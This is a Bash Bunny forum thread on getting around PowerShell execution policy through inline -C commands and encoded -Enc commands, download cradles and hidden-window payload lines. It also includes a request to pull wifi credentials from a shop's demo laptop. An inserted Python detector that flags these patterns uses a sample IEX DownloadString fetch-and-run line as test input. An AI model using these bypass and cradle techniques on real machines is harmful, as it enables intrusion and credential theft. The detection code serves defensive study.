Powershell Scripts


Leeemmery


Has anyone addressed or had problems with running scripts on PowerShell?

By default, my Windows 10 64-bit with all the latest updates disables running of scripts; this can be changed with Set-ExecutionPolicy, but this needs Administrator access to change.

Am I missing something really simple!?


Script execution bypass can also be achieved by running the script as a command or encoded command.

What a lot of people have learned to do here is build stagers and download cradles.

Just wanted to take a moment to say congrats to the Hak5 team. With their inventions, people who get them and really want to use them are forced to learn techniques the bad guys use, like learning to code your own stagers and cradles.

Back to the subject. If your script is extremely small and simple, you can just open a PowerShell prompt with quack commands and type out what you want to do and exit when done. If it is large, you will see people build web servers on the bunny, an SMB server, or even serve it via USB storage from the bunny, with maybe some obfuscation if it is a detectable script.

From the command line they run PowerShell with all the parameters to hide it and end it with "-c" and their code inline to download the script from their bunny and execute it. Most are done that way. You could also encode it and use "-Enc" or any truncation of "-encodedcommand".

Example: set your execution policy to Restricted and try the command below.

powershell -C "$a='I Still Ran.';Write-Host $a;sleep -s 5"

The above should still run.

If you do a "powershell /?", you will see at the bottom of the help how to make an encoded command. If you do that to a whole script, you can run that script from the command line with that encoding and bypass the execution policy, as long as it doesn't go longer than the command-line limit, which is around 8k characters. You could of course compress the script, include the decompression code with it, and encode all that. PowerSploit has a script to do that.

So, if you look through everyone's payloads, you will see how it is getting bypassed. Most of the payloads need to run as admin, so some may have the bypass parameter, but you will see a few that do not, like the PowerShell command to start the cmd process as admin using Start-Process, all from the Run box.
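From the defender's side, the same rules this post relies on (-C for an inline command, -Enc or any truncation of -EncodedCommand, the base64/UTF-16LE encoding shown by `powershell /?`) are exactly what a command-line detector has to handle. The Python below is an added example, not code from this thread or from Hak5: it runs over constructed sample command lines (modelled on Sysmon Event ID 1 / Security 4688 CommandLine fields), decodes -EncodedCommand arguments and flags execution-policy bypass indicators; the sample lines, IP and paths are made up.

```python
import base64
import re
import shlex

# powershell.exe accepts any unambiguous prefix of a switch (-Enc, -ec, -e, -W, -ep ...), so match prefixes.
DOWNLOAD_CRADLE = re.compile(  # script-body indicators of a fetch-and-run cradle
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)

def _is_prefix(token: str, name: str) -> bool:
    """True if token is a switch (-x or /x) whose text is a prefix of the parameter name."""
    if not token or token[0] not in "-/":
        return False
    t = token.lstrip("-/").lower()
    return bool(t) and (name.startswith(t) or (t == "ep" and name == "executionpolicy"))

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE text (see `powershell /?`)."""
    return base64.b64decode(b64).decode("utf-16-le")

def analyze_command_line(cmdline: str) -> dict:
    """Return bypass indicators and the recovered script body for one PowerShell command line."""
    tokens = shlex.split(cmdline, posix=False)  # Windows style: quotes kept, backslashes literal
    findings, script = [], ""
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if _is_prefix(tok, "executionpolicy") and nxt.lower() in ("bypass", "unrestricted"):
            findings.append("executionpolicy-" + nxt.lower())
        elif _is_prefix(tok, "windowstyle") and nxt.lower() == "hidden":
            findings.append("windowstyle-hidden")
        elif _is_prefix(tok, "encodedcommand"):
            findings.append("encodedcommand")
            try:
                script = decode_encoded_command(nxt)
            except ValueError:  # not base64 / not UTF-16LE: still worth an analyst's look
                script = "<undecodable>"
        elif _is_prefix(tok, "command"):  # -C / -Command: the rest of the line is the script
            findings.append("inline-command")
            script = " ".join(tokens[i + 1:]).strip('"')
            break
    if DOWNLOAD_CRADLE.search(script):
        findings.append("download-cradle")
    return {"findings": findings, "script": script}

# Constructed sample command lines, modelled on Sysmon Event ID 1 / Security 4688 CommandLine fields.
ENCODED = base64.b64encode("Write-Host 'I Still Ran.'".encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    'powershell -C "$a=\'I Still Ran.\';Write-Host $a;sleep -s 5"',
    f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
    r"powershell -ExecutionPolicy Bypass -File C:\Temp\inventory.ps1",
    'powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/s.ps1\')"',
]
```

Feed it the CommandLine field of your process-creation events; a hit on "encodedcommand" or "download-cradle" from an interactive user session is the case this thread's technique produces.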


11 hours ago, PoSHMagiC0de said:

Nice trick. Feel free to turn it into a tutorial and you can put it on the Doc/Tut GitHub. Going to release it publicly once I get a few more docs and tuts.


  • 1 year later...

Working at a big box store... PCMgr left and no one knows the wifi password... PowerShell and cmd are disabled on LT in demo mode... will the Bash Bunny be able to pull wifi creds without access to PowerShell or cmd?

TIA,

Zeek


  • 4 months later...
On 9/18/2017 at 10:25 AM, PoSHMagiC0de said:

Hello, how can I, say, join that example with my line of code?

CODE: RUN WIN C:/Windows/System32/WindowsPowerShell/v1.0/powershell  -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads//$SWITCH_POSITION\1.ps1')"


  • 1 year later...

I'm extremely confused because the dump creds said to put the PowerShell script on the root of the bunny, but I thought it had to be on the switch. Which one is it? I could use some help and some advice. I'm new to this, not a developer, just a script kiddy; I'm just now getting into developing.


So I'm having trouble with my Bash Bunny. When I go to use the serial console it says to enter the user name, which is root, but when I enter the user name it freezes and won't let me enter the password for the account. It's all on the default account settings too, and I can't figure out how to change the password or take out the username and hostname so that I'm just prompted for the password, since I can only enter one thing. Can someone give me some advice?


Archived

This topic is now archived and is closed to further replies.
